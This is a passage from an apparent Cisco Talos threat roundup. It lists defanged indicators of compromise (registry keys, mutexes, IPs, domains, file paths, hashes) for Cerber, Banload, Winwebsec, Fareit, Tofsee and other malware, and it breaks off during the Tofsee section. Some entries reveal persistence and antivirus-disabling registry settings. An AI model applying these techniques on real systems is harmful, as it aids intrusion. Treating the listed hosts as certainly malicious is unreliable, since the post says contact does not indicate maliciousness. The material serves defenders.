Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 29 and Feb. 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threatsx we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Ransomware.Cerber-9826975-1 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns other file extensions are used.
Win.Packed.Banload-9827015-0 Packed Banload is a banking trojan believed to be developed by Brazilian cybercriminals and is used primarily to infect machines in Latin America. One notable aspect of Banload is it's use of custom kernel drivers to evade detection.
Win.Trojan.Winwebsec-9828352-0 Trojan Winwebsec installs itself on a compromised system as "anti-malware" software with desktop links and various persistence techniques (Windows service, Registry Run key, etc.). This family is known for using fake alerts for malware found on the system to deceive users into buying services before the "malware" can be removed.
Win.Trojan.Fareit-9829230-0 Trojan The Fareit trojan is primarily an information stealer that can download and install other malware.
Win.Packed.Tofsee-9827033-0 Packed Tofsee is multi-purpose malware that features several modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Spyware.Zbot-9827050-0 Spyware Zbot, also known as Zeus, is a trojan that steals information like banking credentials. It contains many malicious features, including keylogging and form-grabbing.
Win.Packed.Razy-9828691-0 Packed Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data and sends it to a command and control (C2) server. Information collected may include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Ransomware.Ruskill-9827186-1 Ransomware Ruskill, also known as Dorkbot, is a botnet client aimed at stealing credentials and facilitating distributed denial-of-service (DDoS) attacks. It spreads via removable media and through instant messaging applications.
Win.Malware.Python-9827194-0 Malware Win.Malware.Python is a generic name given to malware written in Python and, typically, compiled into a Windows executable using tools like PyInstaller. There is a vast array of supporting libraries, proof-of-concept exploit tools, and example code that makes developing malware in Python easier than with lower-level languages. Examples of functionality commonly seen in this type of malware include the ability to spread laterally by exploiting EternalBlue PoC scripts and file encryption performed by ransomware.

Threat Breakdown

Win.Ransomware.Cerber-9826975-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 146 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: api-PQEC
7
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 7
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
5
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
5
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 22
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 23
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 24
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 25
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 26
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 27
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 28
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 29
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 30
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 31
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 32
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 33
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 34
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 35
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 36
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 37
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 38
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 39
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 40
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 41
1
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 132
shell.{<random GUID>} 24
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269} 5
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} 5
Local\{B1443895-5CF6-0B1E-EE75-506F02798413} 5
{<random GUID>} 5
Global\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 1
Local\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
178[.]128[.]255[.]179 132
91[.]119[.]56[.]0/27 132
91[.]120[.]56[.]0/27 132
91[.]121[.]56[.]0/22 132
104[.]21[.]50[.]61 76
172[.]67[.]2[.]88 53
104[.]20[.]21[.]251 28
172[.]67[.]157[.]138 16
104[.]20[.]20[.]251 15
87[.]106[.]18[.]141 4
54[.]87[.]5[.]88 4
193[.]242[.]211[.]182 2
52[.]21[.]132[.]24 2
104[.]16[.]150[.]172 2
104[.]16[.]148[.]172 2
172[.]67[.]69[.]167 2
239[.]255[.]255[.]250 1
208[.]67[.]222[.]222 1
172[.]86[.]121[.]117 1
104[.]16[.]152[.]172 1
198[.]55[.]100[.]116 1
45[.]56[.]79[.]23 1
224[.]0[.]0[.]1 1
78[.]128[.]92[.]96 1
185[.]85[.]0[.]29 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com 132
bitaps[.]com 132
btc[.]blockr[.]io 132
chain[.]so 132
maytermsmodiall[.]at 4
bizzixi[.]com 3
sochain[.]com 2
p27dokhpz2n7nvgr[.]1ktjse[.]top 2
cfptfinc[.]org 2
www[.]bing[.]com 1
www[.]torproject[.]org 1
222[.]222[.]67[.]208[.]in-addr[.]arpa 1
myip[.]opendns[.]com 1
resolver1[.]opendns[.]com 1
p27dokhpz2n7nvgr[.]1lseoi[.]top 1
en[.]wikipedia[.]org 1
p27dokhpz2n7nvgr[.]1h23cc[.]top 1
p27dokhpz2n7nvgr[.]1cglxz[.]top 1
d39f23jfph0ylk[.]cloudfront[.]net 1
financeanalytics[.]org 1
www[.]php[.]net 1
Files and or directories createdOccurrences
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 133
%TEMP%\d19ab989 132
%TEMP%\d19ab989\4710.tmp 132
%TEMP%\d19ab989\a35f.tmp 132
%LOCALAPPDATA%\Microsoft\Office\Groove1\System\CSMIPC.dat 132
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 132
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 132
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.hta 132
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.png 132
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 24
%TEMP%\24e2b309\1719.tmp 20
%TEMP%\24e2b309\4436.tmp 20
%APPDATA%\Microsoft\Dmlogpui 7
%APPDATA%\Microsoft\Dmlogpui\datat3hc.exe 7
%TEMP%\<random, matching [A-F0-9]{3,4}> 7
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat 7
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 5
%System32%\wbem\Logs\wbemprox.log 4
\I386\COMPDATA\BOSERROR.TXT 4
\I386\RUNW32.BAT 4
\I386\BIOSINFO.INF 4
\I386\COMPDATA\DRVMAIN.INF 4
\I386\COMPDATA\NTCOMPAT.INF 4
\I386\DMREG.INF 4
\I386\DOSNET.INF 4

*See JSON for more IOCs

File Hashes

032c8169d8009fc30479b5ec5438a88fd5daeb576ced3c1d95786c4257ed9145
03fc7d18984c43544b429208a124c1ab3bf71c6876f1f2a1c3b54703f9a53a71
046da337f4ac96c679c3da97556c57427086cb4e81ac4218c2edc7956e775d22
0804f23ccd203cc2de3277a9f6a58e578b716a78f7d93588b9538213a9a6f72f
09223830949749540b60101554bd70596a3f0d3a9e2045647be8e476949900b6
09590181a0f19560f80f28e3c541df7356e5fc7bc373d8d1a33e9a602c7d76dd
0a37d20ad25e354cd3e1f616275021744a7c776dacb45091df94e6883f206dc8
0ad8711b6997b9ccd46d330fa3056745b7981e3fc94ce343732ea47e87576905
0afaf4a5b6fa740a435d93d07f21e3616535725941defc2fc8e447c478aad736
0bb0ab8eff1008d4d5ef1ce2285c7513c87f7fa5d75357f668bdb24b0844844b
0e8ff26596d14aa9947d5fb5399942ea8b17cbadaad54f510495a513715a0ca6
0f1c51d55dc4bde3cf0c62147fbe6409bdc4d341d52247d00f586a6482af1511
0fc6b54304648fc6f5898fa8ab503f685b105357e52db6af021253a56bb8f247
0fd42b326666f13440fa0008f810f0a125e1d25e3225464ebf9262bedb0d835c
10bf9202a6db75f84b931357ac21779597eadbc7bb620f7ff915be705f490309
12bd04c85e976145c51d531bbf4932c38dff9064be2aec2ecb4af3c04d1d4768
14782954d5ba87fc0fd79706df2f3227dea9344226286332a2f4211bd18901af
17aac7c01de3788aad85bc623cf78da5260335083d4d3b77f3682d27462cffea
1947c3ab281844c155f6edbbee45587f70ff02602137a860e53a597c6751df5a
1c3951053d16ee881dfa8d36a9a64473a13f089cfba5c59ebfba9cbac65b47f2
1d665c0a28a799ed88b4fbe1b6b66a89836030c4f9f6b287489fa6c92a350452
239a6af1d1c4b80442cd9524b00c5a0aaf4a01286bed05427f2de3d29e5c973e
2452a341ed8bca9dd380e6b97b0270b75c042b49fa4b7c769e2effa1cf778b57
249ef46ca078e3135fe038e8a34ddab65e01173f59135156927ba648e7c8497f
26c069149f3410c89729662a8a32196ab35619187b98715923ec8d0369ba8aa5

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Win.Packed.Banload-9827015-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
MutexesOccurrences
https://s.dynad.net/stack/KMA9C2O70iP6CHSgXk0LGakpYboY3uBSOgotXt8fklCKbdvX2viwKa3R7j7SBAOi.appcache 10
Global\4e21a441-6158-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
200[.]98[.]206[.]56 17
172[.]217[.]3[.]110 15
172[.]217[.]12[.]164 13
13[.]107[.]21[.]200 11
142[.]250[.]80[.]2 11
157[.]240[.]18[.]35 10
34[.]102[.]185[.]99 10
142[.]250[.]111[.]154/31 10
172[.]217[.]3[.]104 9
157[.]240[.]18[.]19 9
200[.]147[.]166[.]107 9
173[.]223[.]57[.]19 9
31[.]13[.]66[.]19 8
172[.]217[.]10[.]230 8
200[.]147[.]166[.]104 7
200[.]147[.]99[.]186 7
172[.]217[.]6[.]206 6
143[.]204[.]150[.]172 6
172[.]217[.]11[.]34 5
172[.]217[.]10[.]138 5
172[.]217[.]9[.]226 5
172[.]217[.]10[.]35 5
151[.]101[.]248[.]157 5
74[.]119[.]119[.]139 5
186[.]234[.]166[.]8 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]bing[.]com 16
stats[.]g[.]doubleclick[.]net 15
www[.]google-analytics[.]com 15
www[.]google[.]com 15
www[.]facebook[.]com 15
connect[.]facebook[.]net 15
www[.]youtube[.]com 10
pagead2[.]googlesyndication[.]com 10
securepubads[.]g[.]doubleclick[.]net 10
b[.]t[.]tailtarget[.]com 10
me[.]jsuol[.]com[.]br 10
s[.]dynad[.]net 10
t[.]dynad[.]net 10
t[.]tailtarget[.]com 10
tm[.]jsuol[.]com[.]br 10
tm[.]uol[.]com[.]br 10
tt-10162-1[.]seg[.]t[.]tailtarget[.]com 10
www[.]instagram[.]com 9
www[.]googletagmanager[.]com 9
twitter[.]com 9
sb[.]scorecardresearch[.]com 9
googleads[.]g[.]doubleclick[.]net 9
adservice[.]google[.]com 9
tracker[.]bt[.]uol[.]com[.]br 9
clicklogger[.]rm[.]uol[.]com[.]br 6

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\inf\machine1.inf 15
%SystemRoot%\security\~79E6.tmp 3
%SystemRoot%\inf\machinez.inf 2
%TEMP%\~7BA8.tmp 2
%TEMP%\~7BA8files 2
%SystemRoot%\Resources\~7986.tmp 2
%SystemRoot%\SchCache\~79A6.tmp 2
%SystemRoot%\Setup\~7A27.tmp 2
%SystemRoot%\ShellNew\~7A47.tmp 2
%SystemRoot%\Speech\~7A67.tmp 2
%SystemRoot%\SysWOW64\~7A68.tmp 2
%SystemRoot%\TAPI\~7AA8.tmp 2
%SystemRoot%\pss\~7945.tmp 2
%SystemRoot%\schemas\~79A7.tmp 2
%TEMP%\~7BE7.tmp 2
%TEMP%\~7BE7files 2
%SystemRoot%\Vss\~7B76.tmp 2
%SystemRoot%\Web\~7B97.tmp 2
%SystemRoot%\L2Schemas\~79E8.tmp 2
%SystemRoot%\Logs\~7A08.tmp 2
%SystemRoot%\SysWOW64\~7CA9.tmp 2
%SystemRoot%\AppCompat\~76ED.tmp 2
%SystemRoot%\CSC\~7721.tmp 2
%SystemRoot%\Cursors\~7732.tmp 2
%SystemRoot%\Fonts\~7744.tmp 2

*See JSON for more IOCs

File Hashes

0204b13f4c1291b43a448313092c950033a3e90aca2bf3c7be3643c31073d8a5
17b5e62dfe321b46da077148e4dda295c3f2e70ab5d33c2324357de3feec0eee
38e4682bb3b41f766d007f6855c6b89e7cd55780f2117ed0b9bab6f683ae6c35
551752e6431dbc4fcb96de6cc190e80a246e708cbd9b22c937a35b5cbb00362b
5d775811236d96b0e851363ac6c0d4b4c9baf4a0ba6cea808104ecb1c212383c
68f8afc1ce2502a4067bf142cf9484c0298e937ed64d65fa6a1b0944a2f9dd16
7712fc490a58f8a73ebe6bf86c46d88c38815fb9271d58943f6f790020572ace
8cf3085f721a2b952b44941f1c6f607ff73ecb0d2d146eb075a3eb06266eb46a
a5bad3b4f393df83a66515027297378da3c6d7de61572e55c603e031420fb95a
a6f1cabcbf64e60fd79f3800be0035bf6b7ce03dfc26ff9e73a6c6a0210ac993
a86d08279600e9d68e7fa582fd157e76b4769f40bac2bb3de438815307bf5876
a8d5630ff6f7bd1fc47c71a83b01e99b0a2f0a120e60afecaa0417e5dcaf1d5b
be52b8311a9c3ecefd36d84caab444c5d586e49891642248863acd0fe0976cda
d8fd2ca17488db320dd4903a3ea87fe4bd1bc303df128b38ed5baf8fd962ae19
e86786f6262d6b7c1a91174f6f10beebcf3e53289794297ba0d546630c1a5ebd
f40dbbb42a05699f36b51561117fb9986d24f103538f6d56f5fcdb04f38fc715
f5e789e0f97531cf0cb31a47996e1ff0e0fcadd448bc2315ab73f6dea52b4fd6

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Winwebsec-9828352-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LUAFV
Value Name: Start
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: RPSessionInterval
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: 98BE0FA9BB7E8E3C000098BD76F2948C
25
MutexesOccurrences
98BE0FA9BB7E8E3C000098BD76F2948C 25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
103[.]4[.]225[.]41 21
84[.]22[.]104[.]243 4
Files and or directories createdOccurrences
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C 25
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.exe 25
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.ico 25

File Hashes

03ab5894995ad60915df3e093ab2ee14e916d6035cbc494c3bfc05798d604e30
0a73fe98a24f04642bd01b2fa822f166cf985882cb4426745c6e3183dd3e5209
0ad99dba807996815db6bc7a42a52cfde906d01fa512cc3ed72b6d8cff56c492
0bafb9ee7f47965858828b98da0e0ac91de2112011b69c9b80acb4f0f178256e
0cece49caaa8a0162d28a9aee4227df1fed26004ab6baeb518e692877eaf0f29
0cfdfe851f8ca8bd64aa19dfae77a31381446c96a1c17f432702bb2441c025f4
0e322da58134abf4d4f726bbc61b2995880a185c05477ffb1d2834af1a87be6d
1078bf08b864f3dc386d54fce35fcf379600599c39af07a39b59cb346d778544
10b41fa7afe343d6b74ebeec88531d959c89ca242eaf7922e4bf8a1dd1d4ba8f
15ea1fa15f165b9e0d472be90c1aa366a3db9be790c6b18d7223a65d58b29a8d
18b6571fbeb41d4cf6fe11a50ba2653b0e9eb7cfb92f4b560c1cb668cfa93064
197aee782b3ea714bb0cf9de092e946d5990a0bb2183079ec300a478edb45870
19d27b3813983947b4f1dc39d4225a95720b908ee735b9e45357711e780cad9e
1cdb6c7bbba5a98a4d70db2d2d8621f49b7c0d56fe91b39dbb369add2567acbf
1d7d01b9b1eac0e970a1ff0cd64bbbd2c7050a9acc86c5cd8ed72248089ea75f
1f1fc8e3c6aec5e1c80cb2747a9a3970c673794f7a8898f61d020acefb0005c4
21cc33c0cd758806dd3fa1fd49a0aaa3352019478b9ecc5c431dcbc56f6c5ac2
22bf9de7ef6938fb86f1612c41d39506d9d4fa1888169cc4ac355147ca1fcce2
22cb6a06dcad566706bb5a3f2cc9145dbee840d75bd7f98b505435d973b5dfc7
2373f98cb609fad0e392bf0e48fe86d5af9c8bbbac0bf571e709f900f5fd3139
2460f09a62154925ed315c1e6c8d6b5d38cd4498e2ef8a5c31771affe5696cb9
24ed9d857c810e6f129f66477d5f62222a40dcec501dc1ee8cea81f11fc375f7
252d9487fddd19fab5d0aaee091f561a40871657eec2590434bf1785c2d53530
26fc75bc84b6acfcd658fa751accddf45e822542baffc74565aa8e9c67ab9908
271ec90a42cf8043aa8c56492c01ae2a96e564d15ec1d46084acc630e7867e0a

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Fareit-9829230-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cjKyMxqb
2
<HKCU>\SOFTWARE\WINRAR 1
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 1
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
1
<HKCU>\SOFTWARE\REMCOS-7LL9MF 1
<HKCU>\SOFTWARE\REMCOS-7LL9MF
Value Name: licence
1
<HKCU>\SOFTWARE\REMCOS-7LL9MF
Value Name: exepath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mRkdKTfz
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
1
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
1
MutexesOccurrences
3749282D282E1E80C56CAE5A 9
rc/Administrator 2
Remcos_Mutex_Inj 1
Remcos-7LL9MF 1
Global\{a6e61a20-8b7b-40bb-85f9-f6b72081971b} 1
Global\92a631e1-6620-11eb-b5f8-00501e3ae7b6 1
Global\8fbfc361-6620-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
107[.]175[.]150[.]73 6
172[.]217[.]11[.]14 2
173[.]194[.]207[.]139 1
173[.]194[.]66[.]94 1
91[.]195[.]240[.]117 1
209[.]85[.]232[.]95 1
209[.]85[.]201[.]94 1
173[.]194[.]175[.]101 1
79[.]134[.]225[.]53 1
23[.]21[.]126[.]66 1
23[.]21[.]252[.]4 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
drive[.]google[.]com 2
api[.]ipify[.]org 2
kdi-kongsberg[.]com 1
fiftint[.]com 1
grace2020[.]ddns[.]net 1
mirrapl[.]com 1
aladebtrading[.]com 1
Files and or directories createdOccurrences
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 14
%APPDATA%\D282E1\1E80C5.lck 9
%TEMP%\<random GUID> 7
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sgbns.vbs 2
%APPDATA%\sgbns\totio.exe 2
%APPDATA%\sgbns\totio.exe:ZoneIdentifier 2
%APPDATA%\ozNUjFt\SSKEP.exe 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\mercy.vbs 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe.vbs 1
%TEMP%\FB_2CD7.tmp 1
%APPDATA%\mercy\dghfdhfgd.exe 1
%APPDATA%\OLPLgIc\MujEa.exe 1
%APPDATA%\mercy\dghfdhfgd.exe:ZoneIdentifier 1
%APPDATA%\Host Process for Windows Tasks 1
%TEMP%\FB_2CD7.tmp.exe 1
%TEMP%\FB_2F67.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Host Process for Windows Tasks .vbs 1
%TEMP%\FB_2F67.tmp.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SLKT2020020303JPR.vbs 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\CHA21012020102114.vbs 1
%TEMP%\1208794669.bat 1

File Hashes

04da4e4af99a2e4ce39a6249a43f8bf43e44b394c1237cf5298ab6dd3dd733e7
2a1596202915dee55d0307006e6a23b8eb89211e5111c1013c25eaa1f4645683
365ff4c919709767c315b4db9f4ae10f943838b5edb6a47110e9f90a69ddf05e
3a29a92cbd2cbf6f737457ea6944e961af7e6c08d52fd4b5d028303ca390a5e3
3dbf27ce28f414ce08ee9a29533ec17f1f6858dd24aa1c29a494ba8272b8a473
539dcba0f140a20d5ae0222fe6a957aeacd4578230f645c7d194c68efaa53f5e
5add9ca5b092c72b4db0093aa029ffed37b38964a03d7ac64133a5cf65088194
6ab11743bc367e253cd2fb037691854fda077bc0b03202c21ee80d8ad0b58595
6ca536eac48bf749534c57baad735654eaa62e9b22023354477489c1f3717575
6f8e735dde1b30d157d5fd1a4aea08b67ef34e418dfeb961cb79ddb9ff401043
70999eeda65c2a17c1e246be6c9074a07da075eef40a96f47807555b3ef541d6
7ad23e9606d9ef7e717320f211a3b18d9e2601472c4a84567bcc32f504467e2f
850d741fc7017b873ce6834625e306526854c0d88f81a3e162f908b9a8107008
936652a60c5e8577b3dbeb5c0e17e6a757f54b6b3e20cde9a5e6ffe3db632bea
9bb967cdbd3a21565c46969b8194bc486f8720bc1feaedd4b11e9a553e0d6451
cc229b8e20843e2fd6b30beff3bcd7e1eb80fc89f9b88415b7fb76c00f2a5552
d33f2b86f571fbc2b359969cde1ccff467b3e57b77efcf3f13abf069b213ed91
d53923d2d9ab9cc573f32655614d78b94873dce1f7a8745407f58e9edf72ac1f
d861cd5f6496be06f710d5f3a09e0d361ff8efceeb4a0c98d328bd263df72a90
db1d8524d1ba781654ff5ff132c7bed2c1f3d8767c941a64d9af96aa703a5268
e010d7616fea2b40f3ea3db5157ca8f29d80a353fd2bd4a6cd3734d55f42e4fc
ec6723baba12d7ca4ba3efa1a96f208a7d6a990ac3fc3f393ce05770dbf80fc8
f494f9184a467b80bf0b654c0d8f92c454e3c04030751fec3c8a90e0d591723c
f973c47447f9ccb93ef9bcef7b17bf5cc7f8a1f49b811e753b8af1afa384d671

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Tofsee-9827033-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
11
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
